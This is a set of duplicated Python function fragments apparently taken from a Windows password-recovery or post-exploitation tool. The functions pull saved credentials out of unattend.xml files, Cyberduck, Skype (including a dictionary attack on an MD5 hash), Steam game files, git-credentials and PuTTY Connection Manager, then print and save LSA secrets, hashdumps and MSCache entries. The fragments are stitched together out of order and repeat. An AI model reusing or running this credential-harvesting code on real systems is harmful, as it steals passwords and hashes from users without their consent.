def get_application_path(self): directory = os.path.join(constant.profile['APPDATA'], u'Cyberduck') if os.path.exists(directory): for dr in os.listdir(directory): if dr.startswith(u'Cyberduck'): for d in os.listdir(os.path.join(directory, string_to_unicode(dr))): path = os.path.join(directory, string_to_unicode(dr), string_to_unicode(d), u'user.config') return path
def run(self): windir = os.path.join(constant.profile['HOMEDRIVE'], string_to_unicode(os.sep), u'Windows') files = [ 'Panther\\Unattend.xml', 'Panther\\Unattended.xml', 'Panther\\Unattend\\Unattended.xml', 'Panther\\Unattend\\Unattend.xml', 'System32\\Sysprep\\unattend.xml', 'System32\\Sysprep\\Panther\\unattend.xml' ] pwd_found = [] xmlns = '{urn:schemas-microsoft-com:unattend}' for file in files: path = os.path.join(windir, string_to_unicode(file)) if os.path.exists(path): self.debug(u'Unattended file found: %s' % path) tree = ElementTree(file=path) root = tree.getroot() for setting in root.findall('%ssettings' % xmlns): component = setting.find('%scomponent' % xmlns) auto_logon = component.find('%sauto_logon' % xmlns) if auto_logon: username = auto_logon.find('%sUsername' % xmlns) password = auto_logon.find('%sPassword' % xmlns) if all((username, password)): # Remove false positive (with following message on password => *SENSITIVE*DATA*DELETED*) if 'deleted' not in password.text.lower(): pwd_found.append({ 'Login': username.text, 'Password': self.try_b64_decode(password.text) }) user_accounts = component.find('%suser_accounts' % xmlns) if user_accounts: local_accounts = user_accounts.find( '%slocal_accounts' % xmlns) if local_accounts: for local_account in local_accounts.findall( '%slocal_account' % xmlns): username = local_account.find('%sName' % xmlns) password = local_account.find('%sPassword' % xmlns) if all((username, password)): if 'deleted' not in password.text.lower(): pwd_found.append({ 'Login': username.text, 'Password': self.try_b64_decode(password.text) }) return pwd_found
def get_application_path(self): directory = os.path.join(constant.profile['APPDATA'], u'Cyberduck') if os.path.exists(directory): for dr in os.listdir(directory): if dr.startswith(u'Cyberduck'): for d in os.listdir( os.path.join(directory, string_to_unicode(dr))): path = os.path.join(directory, string_to_unicode(dr), string_to_unicode(d), u'user.config') return path
def run(self): windir = os.path.join(constant.profile['HOMEDRIVE'], string_to_unicode(os.sep), u'Windows') files = [ 'Panther\\Unattend.xml', 'Panther\\Unattended.xml', 'Panther\\Unattend\\Unattended.xml', 'Panther\\Unattend\\Unattend.xml', 'System32\\Sysprep\\unattend.xml', 'System32\\Sysprep\\Panther\\unattend.xml' ] pwd_found = [] xmlns = '{urn:schemas-microsoft-com:unattend}' for file in files: path = os.path.join(windir, string_to_unicode(file)) if os.path.exists(path): self.debug(u'Unattended file found: %s' % path) tree = ElementTree(file=path) root = tree.getroot() for setting in root.findall('%ssettings' % xmlns): component = setting.find('%scomponent' % xmlns) auto_logon = component.find('%sauto_logon' % xmlns) if auto_logon: username = auto_logon.find('%sUsername' % xmlns) password = auto_logon.find('%sPassword' % xmlns) if all((username, password)): # Remove false positive (with following message on password => *SENSITIVE*DATA*DELETED*) if 'deleted' not in password.text.lower(): pwd_found.append({ 'Login': username.text, 'Password': self.try_b64_decode(password.text) }) user_accounts = component.find('%suser_accounts' % xmlns) if user_accounts: local_accounts = user_accounts.find('%slocal_accounts' % xmlns) if local_accounts: for local_account in local_accounts.findall('%slocal_account' % xmlns): username = local_account.find('%sName' % xmlns) password = local_account.find('%sPassword' % xmlns) if all((username, password)): if 'deleted' not in password.text.lower(): pwd_found.append({ 'Login': username.text, 'Password': self.try_b64_decode(password.text) }) return pwd_found
def get_info(self, key, username, path): if os.path.exists(os.path.join(path, u'config.xml')): values = {} try: values['Login'] = username # get encrypted hash from the config file enc_hex = self.get_hash_credential(os.path.join(path, u'config.xml')) if not enc_hex: self.warning(u'No credential stored on the config.xml file.') else: # decrypt the hash to get the md5 to brue force values['Hash'] = self.get_md5_hash(enc_hex, key) values['Pattern to bruteforce using md5'] = win.string_to_unicode(values['Login']) + u'\\nskyper\\n<password>' # Try a dictionary attack on the hash password = self.dictionary_attack(values['Login'], values['Hash']) if password: values['Password'] = password self.pwd_found.append(values) except Exception as e: self.debug(str(e))
def run(self): creds = [] results = None # Find the location of steam - to make it easier we're going to use a try block # 'cos I'm lazy try: with win.OpenKey(win.HKEY_CURRENT_USER, 'Software\Valve\Steam') as key: results = winreg.QueryValueEx(key, 'SteamPath') except Exception: pass if results: steampath = string_to_unicode(results[0]) steamapps = os.path.join(steampath, u'SteamApps\common') # Check that we have a SteamApps directory if not os.path.exists(steamapps): self.error(u'Steam doesn\'t have a SteamApps directory.') return filepath = os.path.join(steamapps, u'Turba\\Assets\\Settings.bin') if not os.path.exists(filepath): self.debug(u'Turba doesn\'t appear to be installed.') return # If we're here we should have a valid config file file with open(filepath, mode='rb') as filepath: # We've found a config file, now extract the creds data = filepath.read() chunk = data[0x1b:].split('\x0a') creds.append({'Login': chunk[0], 'Password': chunk[1]}) return creds
def run(self): """ Main function """ # According to the "git-credential-store" documentation: # Build a list of locations in which git credentials can be stored locations = [ os.path.join(constant.profile["USERPROFILE"], u'.git-credentials'), os.path.join(constant.profile["USERPROFILE"], u'.config\\git\\credentials'), ] if "XDG_CONFIG_HOME" in os.environ: locations.append( os.path.join( string_to_unicode(os.environ.get('XDG_CONFIG_HOME')), u'git\\credentials')) # Apply the password extraction on the defined locations pwd_found = [] for location in locations: pwd_found += self.extract_credentials(location) # Filter duplicates return [{ 'URL': url, 'Login': login, 'Password': password } for url, login, password in set(pwd_found)]
def get_default_database(self): try: key = OpenKey(HKEY_CURRENT_USER, 'Software\\ACS\\PuTTY Connection Manager') db = string_to_unicode(winreg.QueryValueEx(key, 'DefaultDatabase')[0]) winreg.CloseKey(key) return db except Exception: return False
def get_username(self, path): xml_file = os.path.join(path, u'shared.xml') if os.path.exists(xml_file): tree = ElementTree(file=xml_file) username = tree.find('Lib/Account/Default') try: return win.string_to_unicode(username.text) except Exception: pass return False
def run(self): creds = [] results = None # Find the location of steam - to make it easier we're going to use a try block # 'cos I'm lazy try: with win.OpenKey(win.HKEY_CURRENT_USER, 'Software\\Valve\\Steam') as key: results = winreg.QueryValueEx(key, 'SteamPath') except Exception: pass if results: steampath = string_to_unicode(results[0]) userdata = os.path.join(steampath, u'userdata') # Check that we have a userdata directory if not os.path.exists(userdata): self.error(u'Steam doesn\'t have a userdata directory.') return # Now look for Galcon Fusion in every user for f in os.listdir(userdata): filepath = os.path.join(userdata, string_to_unicode(f), u'44200\\remote\\galcon.cfg') if not os.path.exists(filepath): continue # If we're here we should have a Galcon Fusion file with open(filepath, mode='rb') as cfgfile: # We've found a config file, now extract the creds data = cfgfile.read() creds.append({ 'Login': data[4:0x23], 'Password': data[0x24:0x43] }) return creds
def run(self): """ Main function """ # According to the "git-credential-store" documentation: # Build a list of locations in which git credentials can be stored locations = [ os.path.join(constant.profile["USERPROFILE"], u'.git-credentials'), os.path.join(constant.profile["USERPROFILE"], u'.config\\git\\credentials'), ] if "XDG_CONFIG_HOME" in os.environ: locations.append(os.path.join(string_to_unicode(os.environ.get('XDG_CONFIG_HOME')), u'git\\credentials')) # Apply the password extraction on the defined locations pwd_found = [] for location in locations: pwd_found += self.extract_credentials(location) # Filter duplicates return [{'URL': url, 'Login': login, 'Password': password} for url, login, password in set(pwd_found)]
def print_output(self, software_name, pwd_found): if pwd_found: # if the debug logging level is not apply => print the title if not logging.getLogger().isEnabledFor(logging.INFO): # print the username only if password have been found user = constant.finalResults.get('User', '') global tmp_user if user != tmp_user: tmp_user = user self.print_user(user, force_print=True) # if not title1: self.print_title(software_name) # Particular passwords representation to_write = [] if software_name in ('Hashdump', 'Lsa_secrets', 'Mscache'): pwds = pwd_found[1] for pwd in pwds: self.do_print(pwd) if software_name == 'Lsa_secrets': hex_value = self.print_hex(pwds[pwd], length=16) to_write.append([pwd.decode(), hex_value.decode()]) self.do_print(hex_value) else: to_write.append(pwd) self.do_print() # Other passwords else: # Remove duplicated password pwd_found = [ dict(t) for t in set([tuple(d.items()) for d in pwd_found]) ] # Loop through all passwords found for pwd in pwd_found: # Detect which kinds of password has been found pwd_lower_keys = {k.lower(): v for k, v in pwd.items()} for p in ('password', 'key', 'hash'): pwd_category = [s for s in pwd_lower_keys if p in s] if pwd_category: pwd_category = pwd_category[0] break write_it = False passwd = None try: passwd_str = pwd_lower_keys[pwd_category] # Do not print empty passwords if not passwd_str: continue passwd = string_to_unicode(passwd_str) except Exception: pass # No password found if not passwd: print_debug("FAILED", u'Password not found !!!') else: constant.nb_password_found += 1 write_it = True print_debug( "OK", u'{pwd_category} found !!!'.format( pwd_category=pwd_category.title())) # Store all passwords found on a table => for dictionary attack if master password set if passwd not in constant.password_found: constant.password_found.append(passwd) pwd_info = [] for p in pwd: try: pwd_line = '%s: %s' % ( p, pwd[p].decode() ) # Manage bytes output (py 3) except Exception: pwd_line = '%s: %s' % (p, pwd[p]) pwd_info.append(pwd_line) self.do_print(pwd_line) self.do_print() if write_it: to_write.append(pwd_info) # write credentials into a text file self.checks_write(to_write, software_name) else: print_debug("INFO", "No passwords found\n")
def print_output(self, software_name, pwd_found): # manage differently hashes / and hex value if pwd_found: category = None if '__LSASecrets__' in pwd_found: pwd_found.remove('__LSASecrets__') category = 'lsa' pwd_found = pwd_found[0] elif '__Hashdump__' in pwd_found: pwd_found.remove('__Hashdump__') category = 'hash' pwd_found = pwd_found[0] elif '__MSCache__' in pwd_found: pwd_found.remove('__MSCache__') category = 'mscache' pwd_found = pwd_found[0] if pwd_found: # if the debug logging level is not apply => print the title if not logging.getLogger().isEnabledFor(logging.INFO): # print the username only if password have been found user = constant.finalResults.get('User', '') global tmp_user if user != tmp_user: tmp_user = user self.print_user(user, force_print=True) # if not title1: self.print_title(software_name) to_write = [] # LSA Secrets will not be written on the output file if category == 'lsa': for k in pwd_found: hex = self.print_hex(pwd_found[k], length=16) to_write.append([k, hex]) self.do_print(k) self.do_print(hex) self.do_print() # Windows Hashes elif category == 'hash': for pwd in pwd_found: self.do_print(pwd) to_write.append(pwd) self.do_print() # Windows MSCache elif category == 'mscache': for pwd in pwd_found: self.do_print(pwd) to_write.append(pwd) self.do_print() # Other passwords else: # Remove duplicated password pwd_found = [ dict(t) for t in set([tuple(d.items()) for d in pwd_found]) ] for pwd in pwd_found: password_category = False # Detect which kinds of password has been found lower_list = [s.lower() for s in pwd] password = [s for s in lower_list if "password" in s] if password: password_category = password else: key = [s for s in lower_list if "key" in s] # for the wifi if key: password_category = key else: hash_ = [s for s in lower_list if "hash" in s] if hash_: password_category = hash_ # Do not print empty passwords try: if not pwd[password_category[0].capitalize()]: continue except Exception: pass # No password found if not password_category: print_debug("FAILED", u'Password not found !!!') else: # Store all passwords found on a table => for dictionary attack if master password set constant.nb_password_found += 1 passwd = None try: passwd = string_to_unicode( pwd[password_category[0].capitalize()]) if passwd and passwd not in constant.password_found: constant.password_found.append(passwd) except Exception as e: pass # Password field is empty if not passwd: print_debug("FAILED", u'Password not found !!!') else: print_debug( "OK", u'{password_category} found !!!'.format( password_category=password_category[0]. title())) to_write.append(pwd) for p in pwd.keys(): self.do_print('%s: %s' % (p, pwd[p])) self.do_print() # write credentials into a text file self.checks_write(to_write, software_name) else: print_debug("INFO", "No passwords found")
def print_output(self, software_name, pwd_found): if pwd_found: # Particular passwords representation to_write = [] if software_name in ('Hashdump', 'Lsa_secrets', 'Mscache'): pwds = pwd_found[1] for pwd in pwds: self.do_print(pwd) if software_name == 'Lsa_secrets': hex_value = self.print_hex(pwds[pwd], length=16) to_write.append([pwd.decode(), hex_value.decode()]) self.do_print(hex_value) else: to_write.append(pwd) self.do_print() # Other passwords else: # Remove duplicated password pwd_found = [dict(t) for t in set([tuple(d.items()) for d in pwd_found])] # Loop through all passwords found for pwd in pwd_found: # Detect which kinds of password has been found pwd_lower_keys = {k.lower(): v for k, v in pwd.items()} for p in ('password', 'key', 'hash'): pwd_category = [s for s in pwd_lower_keys if p in s] if pwd_category: pwd_category = pwd_category[0] break write_it = False passwd = None try: passwd_str = pwd_lower_keys[pwd_category] # Do not print empty passwords if not passwd_str: continue passwd = string_to_unicode(passwd_str) except Exception: pass # No password found if not passwd: print_debug("FAILED", u'Password not found !!!') else: constant.nb_password_found += 1 write_it = True print_debug("OK", u'{pwd_category} found !!!'.format( pwd_category=pwd_category.title())) # Store all passwords found on a table => for dictionary attack if master password set if passwd not in constant.password_found: constant.password_found.append(passwd) pwd_info = [] for p in pwd: try: pwd_line = '%s: %s' % (p, pwd[p].decode()) # Manage bytes output (py 3) except Exception: pwd_line = '%s: %s' % (p, pwd[p]) pwd_info.append(pwd_line) self.do_print(pwd_line) self.do_print() if write_it: to_write.append(pwd_info) else: print_debug("INFO", "No passwords found\n")
def print_output(self, software_name, pwd_found): # manage differently hashes / and hex value if pwd_found: category = None if '__LSASecrets__' in pwd_found: pwd_found.remove('__LSASecrets__') category = 'lsa' pwd_found = pwd_found[0] elif '__Hashdump__' in pwd_found: pwd_found.remove('__Hashdump__') category = 'hash' pwd_found = pwd_found[0] elif '__MSCache__' in pwd_found: pwd_found.remove('__MSCache__') category = 'mscache' pwd_found = pwd_found[0] if pwd_found: # if the debug logging level is not apply => print the title if not logging.getLogger().isEnabledFor(logging.INFO): # print the username only if password have been found user = constant.finalResults.get('User', '') global tmp_user if user != tmp_user: tmp_user = user self.print_user(user, force_print=True) # if not title1: self.print_title(software_name) to_write = [] # LSA Secrets will not be written on the output file if category == 'lsa': for k in pwd_found: hex = self.print_hex(pwd_found[k], length=16) to_write.append([k, hex]) self.do_print(k) self.do_print(hex) self.do_print() # Windows Hashes elif category == 'hash': for pwd in pwd_found: self.do_print(pwd) to_write.append(pwd) self.do_print() # Windows MSCache elif category == 'mscache': for pwd in pwd_found: self.do_print(pwd) to_write.append(pwd) self.do_print() # Other passwords else: # Remove duplicated password pwd_found = [dict(t) for t in set([tuple(d.items()) for d in pwd_found])] for pwd in pwd_found: password_category = False # Detect which kinds of password has been found lower_list = [s.lower() for s in pwd] password = [s for s in lower_list if "password" in s] if password: password_category = password else: key = [s for s in lower_list if "key" in s] # for the wifi if key: password_category = key else: hash_ = [s for s in lower_list if "hash" in s] if hash_: password_category = hash_ # Do not print empty passwords try: if not pwd[password_category[0].capitalize()]: continue except Exception: pass # No password found if not password_category: print_debug("FAILED", u'Password not found !!!') else: # Store all passwords found on a table => for dictionary attack if master password set constant.nb_password_found += 1 passwd = None try: passwd = string_to_unicode(pwd[password_category[0].capitalize()]) if passwd and passwd not in constant.password_found: constant.password_found.append(passwd) except Exception as e: pass # Password field is empty if not passwd: print_debug("FAILED", u'Password not found !!!') else: print_debug("OK", u'{password_category} found !!!'.format( password_category=password_category[0].title())) to_write.append(pwd) for p in pwd: self.do_print('%s: %s' % (p, pwd[p])) self.do_print() # write credentials into a text file self.checks_write(to_write, software_name) else: print_debug("INFO", "No passwords found")